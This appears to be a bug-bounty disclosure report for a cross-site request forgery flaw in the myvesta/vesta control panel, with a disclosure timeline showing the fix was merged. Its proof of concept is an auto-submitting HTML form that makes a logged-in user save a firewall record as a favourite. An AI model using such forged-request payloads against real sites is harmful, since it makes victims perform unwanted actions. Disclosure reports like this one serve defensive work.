Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021


โœ๏ธ Description

Attacker is able to add an element to favorite. this vulnerability happens on some sections. for example on โ€œFirewallโ€ tab list/firewall/

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

1.when you logged in open this POC.html in a browser 2.you can check unintentionally first record saves as favorite

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/add/favorite/index.php">
<input type="hidden" name="v&#95;unit&#95;id" value="11" />
<input type="hidden" name="v&#95;section" value="firewall" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
document.forms[0].submit();
</script>
</html>

๐Ÿ’ฅ Impact

This vulnerability is capable of forging admin or user to unintentional save favorite.

๐Ÿ’ฅ Test

Tested on Edge, Firefox, chrome and safari ๐Ÿ“ Location index.php#L1 ๐Ÿ“ References csrf

Occurences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 3 months ago
Musio modified their report
3 months ago
myvesta validated this vulnerability 3 months ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 475fe4 3 months ago
myvesta has been awarded the fix bounty